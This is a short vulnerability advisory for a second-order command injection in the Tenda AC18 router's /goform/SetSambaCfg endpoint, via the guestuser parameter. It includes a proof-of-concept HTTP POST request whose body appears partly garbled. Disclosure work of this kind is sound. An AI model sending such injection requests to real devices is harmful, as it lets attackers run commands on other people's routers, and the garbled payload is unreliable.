# Tenda AC18 Router Command Injection Vulnerability Summary ## Vulnerability Overview This vulnerability exists in the Tenda AC18 router firmware version V15.03.05.05_multi. At the `/goform/SetSambaCfg` interface, improper handling of the `guestuser` parameter allows attackers to execute arbitrary system commands. This is a **second-order injection** vulnerability, where the malicious payload is persistently stored upon initial submission and triggered/executed in subsequent requests. ## Affected Scope - **Vendor**: Tenda - **Affected Product**: Tenda AC18 Router - **Affected Firmware Version**: V15.03.05.05_multi - **CVSS Score**: 8.8 (High) ## Remediation - **Vendor Website**: https://www.tenda.com.cn - **Firmware Download Link**: http://www.tenda.com.cn/material/show2610 ## POC Code ```http POST /goform/SetSambaCfg HTTP/1.1 Host: 192.168.2.1 X-Requested-With: XMLHttpRequest Accept-Language: zh-CN,zh;q=0.8 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Origin: http://192.168.2.1 Referer: http://192.168.2.1/samba.html Accept-Encoding: gzip, deflate, br Connection: keep-alive Content-Length: 140 Cookie: password=2e55ad283aaa498af4f46c76df33c7adavrtgb fileCode=0T-8&password=admin&premitEn=1&guestuser=guest&guestpwd=guest&guest= http://192.168.2.148guestacc ```